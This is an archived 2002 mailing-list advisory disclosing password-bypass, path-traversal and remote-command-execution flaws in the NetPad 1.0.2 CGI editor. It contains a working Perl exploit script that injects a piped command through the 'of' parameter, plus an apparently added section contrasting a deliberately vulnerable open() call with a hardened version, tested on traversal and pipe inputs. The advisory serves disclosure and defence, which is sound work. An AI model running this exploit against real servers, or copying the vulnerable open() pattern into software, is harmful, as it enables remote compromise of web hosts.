LevCGI.com's NetPad 1.0.2 multiple vulnerabilities

From: BrainRawt . (brainrawtat_private)
Date: Mon May 13 2002 - 18:44:28 PDT


    Levcgi.com's NetPad 1.0.2 Multiple Vulnerabilities Advisory
    Discovered By b0iler(b0ilerat_private) and BrainRawt(brainrawtat_private)
    
    About Netpad:
    ------------------
    <quote from levcgi.com>
    
    Easy to install and use text editor for your web browser! This NotePad like
    program allows you to open your files and pages online in your browser and
    edit their contents through the browser without forcing you to re-upload
    your changes all the time! Extremely efficient and a must have tool for all
    webmasters!
    
    </quote from levcgi.com>
    
    According to the website, "...NetPad has been downloaded 1225 times!"
    
    
    Vulnerable (tested) Versions:
    --------------------
    NetPad v 1.0.2
    
    
    Vendor Contact:
    ----------------
    4-28-02 - Emailed levat_private
    
    
    Vulnerabilities:
    
    -- Password Bypass
    
    1. The website claims a "password security feature to prevent unauthorized
       access!", but this is NOT true.

       A password is not required to read files.  It is only required to write
       to files.
    
    -- Path Traversal
    
    2. Improper filtering of input allows one to enter the traditional
       "../../../" into the input field to crawl back through directories of
       the server hosting netpad.cgi, allowing one to view any file readable by
       the webserver.
    
    -- Command Execution
    
    3. Due to improper usage of the open() function and input filtering, it is
       possible for a malicious visitor to remotely execute commands on the
       server hosting netpad.cgi.

       Proof of concept code can be found below.
    
    Remote Command Execution Exploit (POC):
    ---------------------------------------
    
    #!/usr/bin/perl
    # exploit for levcgi's NetPad 1.0.2
    #
    # This could easily be done with any browser and a little effort.
    #
    # requires LWP available at
    # http://www.linpro.no/lwp/libwww-perl-5.64.tar.gz
    # also, the number of ../'s differs.  It depends on what $basedir
    # is set to in the netpad.cgi script
    #
    # usage: perl script.pl http://site.tld/cgi-bin/netpad.cgi ../../../../bin/command

    use strict;
    use warnings;
    use LWP::UserAgent;
    use HTTP::Request;

    my $ua = LWP::UserAgent->new;
    $ua->agent("your open call can be exploited" . $ua->agent);

    # first argument is the netpad.cgi URL; the remaining arguments form the 'of' value
    my $req = HTTP::Request->new(POST => $ARGV[0]);
    $req->content_type('application/x-www-form-urlencoded');
    my $of = '';
    foreach (@ARGV) { $of .= "$_ " unless ($_ eq $ARGV[0]); }
    $req->content("proc=open&of=${of}|");   # trailing "|" is what the unfiltered open() acts on

    my $res = $ua->request($req);
    if ($res->is_success) { print $res->content . "\n\nit should have worked.\n"; }
    else { print "request failed.\n"; }
    
    Fix:
    ------
    
    No matter how well one filters input to this program, we recommend that the
    program itself be protected by htaccess.
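
    For items 2 and 3 above, the following is an added illustration (not NetPad's or levcgi.com's own code) of the Perl pattern that makes an "open this file" CGI parameter exploitable, beside a confined replacement; $basedir, the 'of' parameter name and the sub names are assumptions.

```perl
#!/usr/bin/perl
# Added illustration, not NetPad's code: the two-argument open() that makes
# a CGI "open this file" parameter exploitable, beside a confined version.
# $basedir, the parameter name 'of' and the sub names are assumptions.
use strict;
use warnings;
use File::Spec;
use File::Temp qw(tempdir);
use Cwd qw(realpath);

# Vulnerable pattern: two-argument open() interprets a trailing "|" as
# "run this as a command", and "../" in the name walks out of $basedir.
sub unsafe_open {
    my ($basedir, $of) = @_;
    open(my $fh, "$basedir/$of") or return;   # "x|" => runs $basedir/x, "../x" => traversal
    return $fh;
}

# Hardened: reject metacharacters, resolve the path, insist it stays under
# $basedir, then use three-argument open() with an explicit read mode so the
# file name is never interpreted as a mode or a command.
sub safe_open {
    my ($basedir, $of) = @_;
    return unless defined $of && length $of;
    return if $of =~ m{[|<>;&`\$\0]};                    # open()/shell metacharacters
    my $resolved = realpath(File::Spec->catfile($basedir, $of));
    return unless defined $resolved;                      # nonexistent path
    return unless index($resolved, realpath($basedir) . '/') == 0;   # confinement
    open(my $fh, '<', $resolved) or return;
    return $fh;
}

# Demonstration on a constructed directory; no request is sent anywhere.
my $dir = tempdir(CLEANUP => 1);
open(my $out, '>', "$dir/page.html") or die $!;
print $out "<h1>hello</h1>\n";
close $out;

for my $input ('page.html', '../../../../etc/passwd', 'id|') {
    my $fh = safe_open($dir, $input);
    printf "%-26s %s\n", $input, $fh ? 'allowed' : 'rejected';
    close $fh if $fh;
}
```

    The metacharacter check is defence in depth; the confinement check on the resolved path is what closes the traversal, and the three-argument open() is what closes the command execution.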
    
    --------------------------------------------------------------------------
    Did you (Lev) say something about stupid people doing stupid things? - BrainRawt
    
    
    This archive was generated by hypermail 2b30 : Tue May 14 2002 - 08:42:02 PDT